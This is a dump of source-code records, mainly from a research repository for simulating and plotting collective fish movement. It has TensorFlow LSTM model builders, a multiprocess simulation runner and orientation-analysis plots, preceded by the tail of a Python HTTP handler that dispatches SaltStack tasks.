但是重装的物理机需要在页面上手动填写物理机IP地址\n \"\"\"\n ipList = []\n for item in self.body.split():\n \tif item:\n ipList.append(item)\n #self.sendHeadersAndContent()\n #print ipList\n failed = deleteMinionKey(ipList) \n self.sendHeadersAndContent()\n #httpserver.httpServerArch.logger.info(\"minuons_key: {0} already deleted..\".format(list(ipList))) \n self.log_warning(\"minuons_key: {0} should delete...,remain: {1}\".format(list(ipList), list(failed)))\n \n elif self.path.startswith('/executetask'):\n \"\"\"\n 这里主要处理页面上提交过来的salt任务\n 这里把任务分为两类(以后分类将会更多)\n \t (1)基础任务和已经定义的任务\n \t (2)自定义module\n \"\"\"\n target = {}\n for item in self.body.split():\n \t tmp = item.split('=')\n \t self.body[tmp[0]] = tmp[1]\n self.sendHeadersAndContent()\n\n if self.body.get('appname', None):\n saltSelfDefinedApp(self.get('appname'), self.get('target'))\n else:\n #module, function,target, *args, **kargs\n saltSelfDefinedModule(self.body.get('module'), self.body.get('function'), self.body.get('target'))\n\n\n\n\ndef main():\n\thttpd = HttpServerArch(('127.0.0.1', 8080), myHttpRequestHandler)\n \thttpd.serve_forever()\n\nmain()\n"
}
] | 10 |
epfl-mobots/find | https://github.com/epfl-mobots/find | ad435541004b8f26c66f941df3e6e63b0442a339 | f7ba7491268501d495db280cdcb4df739c316340 | cd2f751adb60f0c8ce020302805faeafdd58c34f | refs/heads/main | 2023-04-18T02:23:53.398375 | 2023-03-29T21:06:22 | 2023-03-29T21:06:22 | 337,859,711 | 1 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6171384453773499,
"alphanum_fraction": 0.6288137435913086,
"avg_line_length": 39.71300506591797,
"blob_id": "744a3fc3038afa8f962cee15ee7a93fcf4b90af9",
"content_id": "909fb7a5c9b2a92cdfbc7773c6eb78759a9a4146",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9079,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 223,
"path": "/find/models/tf_models.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "import tensorflow as tf\nfrom find.models.tf_losses import *\nimport find.models.tf_activations as tfa\n\n\ndef LSTM(input_shape, output_shape, args):\n optimizer = tf.keras.optimizers.Adam(args.learning_rate)\n model = tf.keras.Sequential()\n model.add(tf.keras.layers.LSTM(128, return_sequences=False,\n input_shape=input_shape, activation='sigmoid'))\n model.add(tf.keras.layers.Dense(80, activation='sigmoid'))\n model.add(tf.keras.layers.Dense(50, activation='sigmoid'))\n model.add(tf.keras.layers.Dense(20, activation='tanh'))\n model.add(tf.keras.layers.Dense(output_shape, activation=None))\n model.compile(\n loss='mse',\n optimizer=optimizer,\n metrics=['mae']\n )\n return model\n\n\ndef PLSTM(input_shape, output_shape, args):\n optimizer = tf.keras.optimizers.Adam(args.learning_rate)\n model = tf.keras.Sequential()\n model.add(tf.keras.layers.LSTM(32, return_sequences=False,\n input_shape=input_shape, activation='sigmoid'))\n model.add(tf.keras.layers.Dense(25, activation='sigmoid'))\n model.add(tf.keras.layers.Dense(16, activation='sigmoid'))\n model.add(tf.keras.layers.Dense(10, activation='tanh'))\n model.add(tf.keras.layers.Dense(output_shape * 2, activation=None))\n model.compile(\n loss=gaussian_nll,\n optimizer=optimizer,\n metrics=[gaussian_mse, gaussian_mae]\n )\n return model\n\n\ndef PLSTM_SHALLOW(input_shape, output_shape, args):\n optimizer = tf.keras.optimizers.Adam(args.learning_rate)\n model = tf.keras.Sequential()\n model.add(tf.keras.layers.LSTM(128, return_sequences=False,\n input_shape=input_shape, activation='tanh'))\n model.add(tf.keras.layers.Dense(50, activation='tanh'))\n model.add(tf.keras.layers.Dense(20, activation='tanh'))\n model.add(tf.keras.layers.Dense(output_shape * 2, activation=None))\n model.compile(\n loss=gaussian_nll,\n optimizer=optimizer,\n metrics=[gaussian_mse, gaussian_mae]\n )\n return model\n\n\ndef PLSTM_2L(input_shape, output_shape, args):\n optimizer = tf.keras.optimizers.Adam(args.learning_rate)\n model = tf.keras.Sequential()\n model.add(tf.keras.layers.LSTM(128, return_sequences=False,\n input_shape=input_shape, activation='relu'))\n model.add(tf.keras.layers.Dense(80, activation='relu'))\n model.add(tf.keras.layers.Dense(50, activation='tanh'))\n model.add(tf.keras.layers.Reshape((1, 50)))\n model.add(tf.keras.layers.LSTM(128, return_sequences=False,\n activation='relu'))\n model.add(tf.keras.layers.Dense(80, activation='relu'))\n model.add(tf.keras.layers.Dense(20, activation='tanh'))\n model.add(tf.keras.layers.Dense(output_shape * 2, activation=None))\n model.compile(\n loss=gaussian_nll,\n optimizer=optimizer,\n metrics=[gaussian_mse, gaussian_mae]\n )\n return model\n\n\ndef PLSTM_MULT_PREDS(input_shape, output_shape, args):\n assert args.prediction_steps > 1\n\n optimizer = tf.keras.optimizers.Adam(args.learning_rate)\n model = tf.keras.Sequential()\n model.add(tf.keras.layers.LSTM(128, return_sequences=False,\n input_shape=input_shape, activation='tanh'))\n model.add(tf.keras.layers.Dense(80, activation='tanh'))\n model.add(tf.keras.layers.Dense(50, activation='tanh'))\n model.add(tf.keras.layers.Dense(80, activation='tanh'))\n model.add(tf.keras.layers.Dense(20, activation='tanh'))\n model.add(tf.keras.layers.Dense(\n output_shape * args.prediction_steps * 2, activation=None))\n model.add(tf.keras.layers.Lambda(\n lambda x: tf.reshape(x, shape=(-1, 1, args.prediction_steps, output_shape * 2))))\n model.compile(\n loss=multi_dim_gaussian_nll,\n optimizer=optimizer,\n )\n return model\n\n\ndef PFW(input_shape, output_shape, args):\n optimizer = tf.keras.optimizers.Adam(args.learning_rate)\n model = tf.keras.Sequential()\n model.add(tf.keras.layers.Flatten(input_shape=input_shape))\n model.add(tf.keras.layers.Dense(100, activation=gaussian))\n model.add(tf.keras.layers.Dense(80, activation='tanh'))\n model.add(tf.keras.layers.Dense(50, activation='tanh'))\n model.add(tf.keras.layers.Dense(80, activation='tanh'))\n model.add(tf.keras.layers.Dense(20, activation='tanh'))\n model.add(tf.keras.layers.Dense(output_shape * 2, activation=None))\n loss = gaussian_nll\n optimizer = tf.keras.optimizers.Adam(args.learning_rate)\n model.compile(loss=loss,\n optimizer=optimizer,\n metrics=[gaussian_mse, gaussian_mae]\n )\n return model\n\n\ndef LCONV(input_shape, output_shape, args):\n optimizer = tf.keras.optimizers.Adam(args.learning_rate)\n model = tf.keras.Sequential()\n model.add(tf.keras.layers.LSTM(128, return_sequences=True,\n input_shape=input_shape, activation='tanh'))\n model.add(tf.keras.layers.Conv1D(\n 128, kernel_size=3, input_shape=(100, 1), padding='causal', activation='relu'))\n model.add(tf.keras.layers.MaxPool1D(pool_size=2))\n model.add(tf.keras.layers.Conv1D(\n 64, kernel_size=2, padding='causal', activation='relu'))\n model.add(tf.keras.layers.MaxPool1D(pool_size=2))\n model.add(tf.keras.layers.Conv1D(\n 32, kernel_size=1, padding='causal', activation='relu'))\n model.add(tf.keras.layers.Flatten())\n model.add(tf.keras.layers.Dense(30, activation='tanh'))\n model.add(tf.keras.layers.Dense(output_shape * 2, activation=None))\n model.compile(\n loss=gaussian_nll,\n optimizer=optimizer,\n metrics=[gaussian_mse, gaussian_mae]\n )\n return model\n\n\ndef PLSTM_model_builder(input_shape, output_shape, args):\n assert len(args.model_layers) == len(\n args.model_neurons), 'Number of layers and neuron mapping should have the same length'\n optimizer = tf.keras.optimizers.Adam(args.learning_rate)\n model = tf.keras.Sequential()\n\n for idx, l in enumerate(args.model_layers):\n if args.model_activations[idx] == 'None':\n activation = None\n elif args.model_activations[idx] in list(tfa.activations.keys()):\n activation = tfa.activations[args.model_activations[idx]]\n else:\n activation = args.model_activations[idx]\n\n if l == 'LSTM':\n if idx == 0:\n model.add(tf.keras.layers.LSTM(args.model_neurons[idx], return_sequences=False,\n input_shape=input_shape, activation=activation))\n else:\n model.add(tf.keras.layers.LSTM(args.model_neurons[idx], return_sequences=False,\n activation=activation))\n elif l == 'Dense':\n model.add(tf.keras.layers.Dense(\n args.model_neurons[idx], activation=activation))\n elif l == 'Reshape':\n model.add(tf.keras.layers.Reshape((1, args.model_neurons[idx])))\n elif l == 'Dropout':\n model.add(tf.keras.layers.Dropout(\n float(args.model_activations[idx])))\n elif l == 'Dense_out':\n if args.model_neurons[idx] > 0:\n neurons = args.model_neurons[idx]\n else:\n neurons = output_shape * 2\n model.add(tf.keras.layers.Dense(\n neurons, activation=activation))\n elif l == 'Norm': \n model.add(tf.keras.layers.BatchNormalization())\n\n model.compile(\n loss=gaussian_nll,\n optimizer=optimizer,\n metrics=[gaussian_mse, gaussian_mae]\n )\n return model\n\n\ndef PFW_model_builder(input_shape, output_shape, args):\n assert len(args.model_layers) == len(\n args.model_neurons), 'Number of layers and neuron mapping should have the same length'\n optimizer = tf.keras.optimizers.Adam(args.learning_rate)\n model = tf.keras.Sequential()\n model.add(tf.keras.layers.Flatten(input_shape=input_shape))\n\n for idx, l in enumerate(args.model_layers):\n if args.model_activations[idx] == 'None':\n activation = None\n elif args.model_activations[idx] in list(tfa.activations.keys()):\n activation = tfa.activations[args.model_activations[idx]]\n else:\n activation = args.model_activations[idx]\n\n if l == 'Dense':\n model.add(tf.keras.layers.Dense(\n args.model_neurons[idx], activation=activation))\n elif l == 'Dropout':\n model.add(tf.keras.layers.Dropout(\n float(activation)))\n elif l == 'Dense_out':\n if args.model_neurons[idx] > 0:\n neurons = args.model_neurons[idx]\n else:\n neurons = output_shape * 2\n model.add(tf.keras.layers.Dense(\n neurons, activation=activation))\n\n model.compile(\n loss=gaussian_nll,\n optimizer=optimizer,\n metrics=[gaussian_mse, gaussian_mae]\n )\n return model\n"
},
{
"alpha_fraction": 0.5225752592086792,
"alphanum_fraction": 0.5261984467506409,
"avg_line_length": 45.296775817871094,
"blob_id": "7c4b151dd2b9daca34ef6da7762925281661aa28",
"content_id": "6c4627ff9bf375caa2798e17919d24c59f617ca9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7176,
"license_type": "no_license",
"max_line_length": 150,
"num_lines": 155,
"path": "/find/simulation/simulation.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nimport os\nimport sys\nimport argparse\nfrom tqdm import tqdm\nfrom multiprocessing import Pool\n\nfrom find.models.loader import Loader\nfrom find.models.storage import ModelStorage\nfrom find.models.model_factory import ModelFactory\nfrom find.simulation.simulation_factory import available_functors, SimulationFactory, get_most_influential_individual\n\n\ndef run_process(process):\n # os.system('python {}'.format(process))\n os.system('python {} >/dev/null 2>&1'.format(process))\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Interaction simulator')\n parser.add_argument('--path', '-p', type=str,\n help='Path to the experiment',\n required=True)\n parser.add_argument('--reference', '-r', type=str,\n help='Path to a reference experiment position file',\n required=True)\n parser.add_argument('--load', '-l',\n type=str,\n help='Load model from existing file and continue the training process',\n required=False)\n parser.add_argument('--num_proc', '-j', type=int,\n help='Number of pool processes to use',\n default=16,\n required=False)\n parser.add_argument('--backend',\n help='Backend selection',\n default='keras',\n choices=['keras', 'trajnet'])\n\n # model selection arguments\n nn_functor_selection = parser.add_argument_group('NN functor selection')\n nn_functor_selection.add_argument('--nn_functor',\n default=available_functors()[0],\n choices=available_functors())\n\n # simulation arguments\n simulation_group = parser.add_argument_group('Simulation configuration')\n simulation_group.add_argument('--iterations', '-i', type=int,\n help='Number of iteration of the simulation',\n default=-1,\n required=False)\n simulation_group.add_argument('--timestep', '-t', type=float,\n help='Simulation timestep',\n required=True)\n simulation_group.add_argument('--num_timesteps', type=int,\n help='Number of LSTM timesteps',\n default=0)\n simulation_group.add_argument('--prediction_steps', type=int,\n help='Number of prediction steps for the NN',\n default=1)\n simulation_group.add_argument('--distance_inputs', action='store_true',\n help='Use distance data as additional NN inputs',\n default=False)\n simulation_group.add_argument('--exclude_index', '-e', type=int,\n help='Index of the individual that will be replaced by a virtual agent (-1 will replace all original trajectories)',\n required=False,\n default=-1)\n simulation_group.add_argument('--polar', action='store_true',\n help='Use polar inputs instead of cartesian coordinates',\n default=False)\n simulation_group.add_argument('--timesteps_skip', type=int,\n help='Timesteps skipped between input and prediction',\n default=0,\n required=False)\n simulation_group.add_argument('--num_extra_virtu', type=int,\n help='Number of virtual individuals in the simulation',\n default=0)\n simulation_group.add_argument('--num_neighs_consider', type=int,\n help='Number of neighbours to consider in the simulation',\n default=1)\n simulation_group.add_argument('--most_influential_individual',\n help='Criterion for most influential individual',\n default=get_most_influential_individual()[0],\n choices=get_most_influential_individual())\n simulation_group.add_argument('--var_coef', type=float,\n help='Prediction variance coefficient',\n default=1.0,\n required=False)\n simulation_group.add_argument('--body_len', type=float,\n help='Fish body length (normalized)',\n default=0.19,\n required=False)\n simulation_group.add_argument('--simu_out_dir', type=str,\n help='Directory for simulation output files (always relative to the experiment path)',\n default='generated',\n required=False)\n simulation_group.add_argument('--simu_stat_dump_period', type=int,\n help='Write stat every set amount of iterations',\n default=-1,\n required=False)\n\n args = parser.parse_args()\n args.simu_out_dir = args.path + '/' + args.simu_out_dir\n\n loader = Loader(path=args.path)\n model_storage = ModelStorage(args.path)\n model_factory = ModelFactory()\n simu_factory = SimulationFactory()\n\n model = model_storage.load_model(\n args.load, args.backend, args)\n if args.backend == 'keras':\n model.summary()\n elif args.backend == 'trajnet':\n args.nn_functor = 'trajnet_dir'\n\n print('Using {} backend'.format(args.backend))\n\n # read reference data\n data, files = loader.load(args.reference, is_absolute=True)\n if args.num_proc < 0:\n args.num_proc = len(data)\n\n if len(data) == 1:\n # generate simulator\n simu = simu_factory(\n data[0], model, args.nn_functor, args.backend, args)\n if simu is None:\n import warnings\n warnings.warn('Skipping small simulation')\n exit(1)\n simu.spin()\n else:\n # in case we have multiple reference files then we create a number\n # of parallel process that will each simulate different reference\n # files.\n if '-reference' in sys.argv:\n idx_ref_file = sys.argv.index('-reference') + 1\n else:\n idx_ref_file = sys.argv.index('-r') + 1\n cmd = sys.argv\n\n simu_list = []\n for i, d in enumerate(data):\n f = files[i]\n cmd[idx_ref_file] = f\n simu_list.append(' '.join(cmd))\n\n with Pool(processes=args.num_proc) as p:\n total_simus = len(simu_list)\n with tqdm(total=total_simus, desc='Running multiple simulations') as pbar:\n for i, _ in enumerate(p.imap_unordered(run_process, simu_list)):\n pbar.update()\n"
},
{
"alpha_fraction": 0.5073617100715637,
"alphanum_fraction": 0.5235973000526428,
"avg_line_length": 37.42507553100586,
"blob_id": "26e1c0f7079a711c20e28533d9404585263f98a8",
"content_id": "07bd200b3d657ff2347cdf33b4f28c5a394497c1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 12565,
"license_type": "no_license",
"max_line_length": 173,
"num_lines": 327,
"path": "/find/plots/spatial/relative_orientation.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nimport glob\nimport argparse\n\nfrom find.utils.utils import angle_to_pipi, compute_leadership\nfrom find.utils.features import Velocities\nfrom find.plots.common import *\n\nfrom copy import deepcopy\n\n\ndef relative_orientation_to_neigh(data, ax, args):\n lines = ['-']\n linecycler = cycle(uni_lines)\n new_palette = uni_palette()\n # for p in uni_palette():\n # new_palette.extend([p, p, p])\n ccycler = cycle(sns.color_palette(new_palette))\n\n labels = []\n leadership = {}\n\n leadership = {}\n for k in sorted(data.keys()):\n pos = data[k]['pos']\n vel = data[k]['vel']\n leadership[k] = []\n for idx in range(len(pos)):\n (_, leadership_timeseries) = compute_leadership(pos[idx], vel[idx])\n leadership[k].append(leadership_timeseries)\n\n for k in sorted(data.keys()):\n leaders = leadership[k]\n labels.append(k)\n\n leader_dist = []\n follower_dist = []\n\n for e in range(len(data[k]['pos'])):\n p = data[k]['pos'][e]\n v = data[k]['vel'][e]\n\n hdgs = np.empty((p.shape[0], 0))\n for i in range(p.shape[1] // 2):\n hdg = np.arctan2(v[:, i*2+1], v[:, i*2])\n hdgs = np.hstack((hdgs, hdg.reshape(-1, 1)))\n\n # for the focal\n angle_dif_focal = hdgs[:, 0] - hdgs[:, 1]\n angle_dif_focal = list(map(angle_to_pipi, angle_dif_focal))\n angle_dif_focal = np.array(list(\n map(lambda x: x * 180 / np.pi, angle_dif_focal)))\n\n # for the neigh\n angle_dif_neigh = hdgs[:, 1] - hdgs[:, 0]\n angle_dif_neigh = list(map(angle_to_pipi, angle_dif_neigh))\n angle_dif_neigh = np.array(list(\n map(lambda x: x * 180 / np.pi, angle_dif_neigh)))\n angle_difs = [angle_dif_focal, angle_dif_neigh]\n\n leadership_mat = np.array(leaders[e])\n for j in range(p.shape[1] // 2):\n idx_leaders = np.where(leadership_mat[:, 1] == j)\n\n leader_dist += angle_difs[j][idx_leaders].tolist()\n follower_idcs = list(range(p.shape[1] // 2))\n follower_idcs.remove(j)\n for fidx in follower_idcs:\n follower_dist += angle_difs[fidx][idx_leaders].tolist()\n\n print('Orientation to neigh', k)\n print('LF: ', np.mean(leader_dist+follower_dist),\n np.std(leader_dist+follower_dist))\n\n ax = sns.kdeplot(leader_dist + follower_dist, ax=ax, color=next(ccycler),\n linestyle=next(linecycler), label=k, linewidth=uni_linewidth, gridsize=args.kde_gridsize, clip=[-180, 180], bw_adjust=.35, cut=-1)\n # sns.kdeplot(leader_dist, ax=ax, color=next(ccycler),\n # linestyle=next(linecycler), label='Leader (' + k + ')', linewidth=uni_linewidth, gridsize=args.kde_gridsize, clip=[-180, 180], bw_adjust=.25, cut=-1)\n # sns.kdeplot(follower_dist, ax=ax, color=next(ccycler),\n # linestyle=next(linecycler), label='Follower (' + k + ')', linewidth=uni_linewidth, gridsize=args.kde_gridsize, clip=[-180, 180], bw_adjust=.25, cut=-1)\n return ax\n\n\ndef relative_orientation_to_wall(data, ax, args):\n lines = ['--', ':']\n linecycler = cycle(lines)\n new_palette = uni_palette()\n new_palette *= 3\n ccycler = cycle(sns.color_palette(new_palette))\n\n labels = []\n leadership = {}\n\n leadership = {}\n for k in sorted(data.keys()):\n pos = data[k]['pos']\n vel = data[k]['vel']\n leadership[k] = []\n for idx in range(len(pos)):\n (_, leadership_timeseries) = compute_leadership(pos[idx], vel[idx])\n leadership[k].append(leadership_timeseries)\n\n for k in sorted(data.keys()):\n leaders = leadership[k]\n labels.append(k)\n\n leader_dist = []\n follower_dist = []\n\n for e in range(len(data[k]['pos'])):\n p = data[k]['pos'][e]\n v = data[k]['vel'][e]\n\n hdgs = np.empty((p.shape[0], 0))\n for i in range(p.shape[1] // 2):\n hdg = np.arctan2(v[:, i*2+1], v[:, i*2])\n hdgs = np.hstack((hdgs, hdg.reshape(-1, 1)))\n\n # for the focal\n angle_dif_focal = hdgs[:, 0] - np.arctan2(p[:, 1], p[:, 0])\n angle_dif_focal = list(map(angle_to_pipi, angle_dif_focal))\n angle_dif_focal = np.array(list(\n map(lambda x: x * 180 / np.pi, angle_dif_focal)))\n\n # for the neigh\n angle_dif_neigh = hdgs[:, 1] - np.arctan2(p[:, 3], p[:, 2])\n angle_dif_neigh = list(map(angle_to_pipi, angle_dif_neigh))\n angle_dif_neigh = np.array(list(\n map(lambda x: x * 180 / np.pi, angle_dif_neigh)))\n angle_difs = [angle_dif_focal, angle_dif_neigh]\n\n leadership_mat = np.array(leaders[e])\n for j in range(p.shape[1] // 2):\n idx_leaders = np.where(leadership_mat[:, 1] == j)\n\n leader_dist += angle_difs[j][idx_leaders].tolist()\n follower_idcs = list(range(p.shape[1] // 2))\n follower_idcs.remove(j)\n for fidx in follower_idcs:\n follower_dist += angle_difs[fidx][idx_leaders].tolist()\n\n print('Orientation to wall', k)\n print('LF: ', np.mean(leader_dist+follower_dist),\n np.std(leader_dist+follower_dist))\n print('L: ', np.mean(leader_dist),\n np.std(leader_dist))\n print('F: ', np.mean(follower_dist),\n np.std(follower_dist))\n\n ccolour = next(ccycler)\n # ax = sns.kdeplot(leader_dist + follower_dist, ax=ax, color=next(ccycler),\n # linestyle=next(linecycler), label=k, linewidth=uni_linewidth, gridsize=args.kde_gridsize, clip=[-180, 180], bw_adjust=.15, cut=-1)\n ax = sns.kdeplot(leader_dist, ax=ax, color=ccolour,\n linestyle='--', label='Leader (' + k + ')', linewidth=uni_linewidth, gridsize=args.kde_gridsize, clip=[-180, 180], bw_adjust=.15, cut=-1)\n ax = sns.kdeplot(follower_dist, ax=ax, color=ccolour,\n linestyle=':', label='Follower (' + k + ')', linewidth=uni_linewidth, gridsize=args.kde_gridsize, clip=[-180, 180], bw_adjust=.15, cut=-1)\n return ax\n\n\ndef viewing_angle(data, ax, args):\n lines = ['--', ':']\n linecycler = cycle(lines)\n new_palette = uni_palette()\n ccycler = cycle(sns.color_palette(new_palette))\n\n labels = []\n leadership = {}\n\n leadership = {}\n for k in sorted(data.keys()):\n pos = data[k]['pos']\n vel = data[k]['vel']\n leadership[k] = []\n for idx in range(len(pos)):\n (_, leadership_timeseries) = compute_leadership(pos[idx], vel[idx])\n leadership[k].append(leadership_timeseries)\n\n for k in sorted(data.keys()):\n leaders = leadership[k]\n labels.append(k)\n\n leader_dist = []\n follower_dist = []\n\n for e in range(len(data[k]['pos'])):\n p = data[k]['pos'][e]\n v = data[k]['vel'][e]\n\n hdgs = np.empty((p.shape[0], 0))\n for i in range(p.shape[1] // 2):\n hdg = np.arctan2(v[:, i*2+1], v[:, i*2])\n hdgs = np.hstack((hdgs, hdg.reshape(-1, 1)))\n\n # for the focal\n angle_dif_focal = hdgs[:, 0] - \\\n np.arctan2(p[:, 3] - p[:, 1], p[:, 2] - p[:, 0])\n angle_dif_focal = list(map(angle_to_pipi, angle_dif_focal))\n angle_dif_focal = np.array(list(\n map(lambda x: x * 180 / np.pi, angle_dif_focal)))\n\n # for the neigh\n angle_dif_neigh = hdgs[:, 1] - \\\n np.arctan2(p[:, 1] - p[:, 3], p[:, 0] - p[:, 2])\n angle_dif_neigh = list(map(angle_to_pipi, angle_dif_neigh))\n angle_dif_neigh = np.array(list(\n map(lambda x: x * 180 / np.pi, angle_dif_neigh)))\n angle_difs = [angle_dif_focal, angle_dif_neigh]\n\n leadership_mat = np.array(leaders[e])\n for j in range(p.shape[1] // 2):\n idx_leaders = np.where(leadership_mat[:, 1] == j)\n\n leader_dist += angle_difs[j][idx_leaders].tolist()\n follower_idcs = list(range(p.shape[1] // 2))\n follower_idcs.remove(j)\n for fidx in follower_idcs:\n follower_dist += angle_difs[fidx][idx_leaders].tolist()\n\n print('Viewing angle', k)\n print('LF: ', np.mean(leader_dist+follower_dist),\n np.std(leader_dist+follower_dist))\n print('L: ', np.mean(leader_dist),\n np.std(leader_dist))\n print('F: ', np.mean(follower_dist),\n np.std(follower_dist))\n\n ccolour = next(ccycler)\n # ax = sns.kdeplot(leader_dist + follower_dist, ax=ax, color=ccolour,\n # linestyle=next(linecycler), label=k, linewidth=uni_linewidth, gridsize=args.kde_gridsize, clip=[-200, 200], bw_adjust=.25, cut=-1)\n ax = sns.kdeplot(leader_dist, ax=ax, color=ccolour,\n linestyle='--', label='Leader (' + k + ')', linewidth=uni_linewidth, gridsize=args.kde_gridsize, clip=[-200, 200], bw_adjust=.25, cut=-1)\n ax = sns.kdeplot(follower_dist, ax=ax, color=ccolour,\n linestyle=':', label='Follower (' + k + ')', linewidth=uni_linewidth, gridsize=args.kde_gridsize, clip=[-200, 200], bw_adjust=.25, cut=-1)\n return ax\n\n\ndef plot(exp_files, path, args):\n data = {}\n for e in sorted(exp_files.keys()):\n pos = glob.glob(args.path + '/' + exp_files[e])\n if len(pos) == 0:\n continue\n data[e] = {'pos': [], 'vel': []}\n for p in pos:\n p = np.loadtxt(p) * args.radius\n v = Velocities([p], args.timestep).get()[0]\n data[e]['pos'].append(p)\n data[e]['vel'].append(v)\n\n # relative angle to neigh\n _ = plt.figure(figsize=(6, 5))\n ax = plt.gca()\n\n ax = relative_orientation_to_neigh(data, ax, args)\n\n ax.set_xlabel(r'$\\Delta \\phi$ (degrees)')\n ax.set_ylabel('PDF')\n ax.set_xticks(np.arange(-180, 181, 60))\n ax.legend()\n plt.savefig(path + 'relative_orientation.png')\n\n # relative angle to wall\n _ = plt.figure(figsize=(6, 5))\n ax = plt.gca()\n\n ax = relative_orientation_to_wall(data, ax, args)\n\n ax.set_xlabel(r'$\\theta_w$ (degrees)')\n ax.set_ylabel('PDF')\n ax.set_xticks(np.arange(-180, 181, 60))\n ax.legend()\n plt.savefig(path + 'relative_orientation_wall.png')\n\n # viewing angle\n _ = plt.figure(figsize=(6, 5))\n ax = plt.gca()\n\n ax = viewing_angle(data, ax, args)\n\n ax.set_xlabel(r'$\\psi$ (degrees)')\n ax.set_ylabel('PDF')\n ax.set_xticks(np.arange(-200, 201, 50))\n ax.legend()\n plt.savefig(path + 'viewing_angle.png')\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Relative orientation figure')\n parser.add_argument('--path', '-p', type=str,\n help='Path to data directory',\n required=True)\n parser.add_argument('--radius', '-r', type=float,\n help='Radius',\n default=0.25,\n required=False)\n parser.add_argument('--timestep', '-t', type=float,\n help='Simulation timestep',\n required=True)\n parser.add_argument('--type',\n nargs='+',\n default=['Real', 'Hybrid', 'Virtual'],\n choices=['Real', 'Hybrid', 'Virtual'])\n parser.add_argument('--original_files',\n type=str,\n default='raw/*processed_positions.dat',\n required=False)\n parser.add_argument('--hybrid_files',\n type=str,\n default='generated/*generated_positions.dat',\n required=False)\n parser.add_argument('--virtual_files',\n type=str,\n default='generated/*generated_virtu_positions.dat',\n required=False)\n args = parser.parse_args()\n\n exp_files = {}\n for t in args.type:\n if t == 'Real':\n exp_files[t] = args.original_files\n elif t == 'Hybrid':\n exp_files[t] = args.hybrid_files\n elif t == 'Virtual':\n exp_files[t] = args.virtual_files\n\n plot(exp_files, './', args)\n"
},
{
"alpha_fraction": 0.44731712341308594,
"alphanum_fraction": 0.48753461241722107,
"avg_line_length": 35.36940383911133,
"blob_id": "05258a8894fbb721fae57585ea4b3ddf3587f32a",
"content_id": "d56abc87026b54c0c15f3e7b7e6b1e160453ad6a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9747,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 268,
"path": "/find/plots/dl_si_2021/correlation_quantities.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nimport glob\nimport argparse\nfrom turtle import position\n\nfrom find.utils.features import Velocities\nfrom find.plots.common import *\nimport find.plots.common as shared\nfrom find.utils.utils import angle_to_pipi\n\nfrom find.plots.correlation.position_correlation import corx\nfrom find.plots.correlation.velocity_correlation import corv\nfrom find.plots.correlation.relative_orientation_correlation import cortheta\n\nfrom matplotlib.ticker import (MultipleLocator, FormatStrFormatter,\n AutoMinorLocator, FuncFormatter)\n\n\nROBOT_DATA = True\nTRAJNET_DATA = False\nPFW_DATA = False\nDISABLE_TOULOUSE = False\n\n# TRAJNET_DATA = False\n# PFW_DATA = False\n# DISABLE_TOULOUSE = False\n\n# TRAJNET_DATA = False\n# PFW_DATA = True\n# DISABLE_TOULOUSE = False\n\n# TRAJNET_DATA = True\n# PFW_DATA = False\n# DISABLE_TOULOUSE = True\n\n\ndef reset_palette():\n if TRAJNET_DATA:\n shared._uni_pallete = [\"#000000\", \"#ed8b02\", \"#e74c3c\"]\n elif PFW_DATA:\n shared._uni_pallete = [\"#000000\", \"#D980FA\"]\n elif ROBOT_DATA:\n shared._uni_pallete = [\"#000000\", \"#e74c3c\", \"#2596be\"]\n else:\n shared._uni_pallete = [\"#000000\", \"#e74c3c\", \"#3498db\", \"#2ecc71\"]\n\n\ndef annot_axes(ax, xlabel, ylabel, xlim, ylim, xloc, yloc, yscale):\n ax.set_xlabel(xlabel)\n ax.set_xlim(xlim)\n ax.xaxis.set_major_locator(MultipleLocator(xloc[0]))\n ax.xaxis.set_minor_locator(MultipleLocator(xloc[1]))\n ax.tick_params(axis=\"x\", which='both',\n direction=\"in\")\n ax.tick_params(axis=\"x\", which='major', length=4.0, width=0.7)\n ax.tick_params(axis=\"x\", which='minor', length=2.0, width=0.7)\n\n ax.set_ylabel(ylabel)\n ylim = [e / yscale for e in ylim]\n ax.set_ylim(ylim)\n ax.get_yaxis().set_major_formatter(\n FuncFormatter(lambda x, p: '{:.1f}'.format(x * yscale, ',')))\n ax.yaxis.set_major_locator(MultipleLocator(yloc[0] / yscale))\n ax.yaxis.set_minor_locator(MultipleLocator(yloc[1] / yscale))\n ax.tick_params(which='both', bottom=True,\n left=True, right=True, top=True)\n ax.tick_params(axis=\"y\", which='both', direction=\"in\")\n ax.grid(False)\n return ax\n\n\ndef plot(exp_files, path, args):\n data = {}\n for e in sorted(exp_files.keys()):\n pos = glob.glob(args.path + '/' + exp_files[e])\n if len(pos) == 0:\n continue\n data[e] = {}\n data[e]['pos'] = []\n data[e]['vel'] = []\n data[e]['rvel'] = []\n data[e]['interindividual_distance'] = []\n data[e]['rel_or'] = []\n for p in pos:\n if e == 'Virtual (Toulouse)' and not DISABLE_TOULOUSE:\n f = open(p)\n # to allow for loading fortran's doubles\n strarray = f.read().replace(\"D+\", \"E+\").replace(\"D-\", \"E-\")\n f.close()\n num_ind = len(strarray.split('\\n')[0].strip().split(' '))\n positions = np.fromstring(\n strarray, sep='\\n').reshape(-1, num_ind) * args.radius\n elif e == 'Virtual (Toulouse cpp)':\n positions = np.loadtxt(p)[:, 2:] * args.radius\n else:\n positions = np.loadtxt(p) * args.radius\n if args.num_virtual_samples > 0:\n positions = positions[:args.num_virtual_samples]\n\n if e == 'Robot':\n velocities = Velocities([positions], 0.1).get()[0]\n else:\n velocities = Velocities([positions], args.timestep).get()[0]\n linear_velocity = 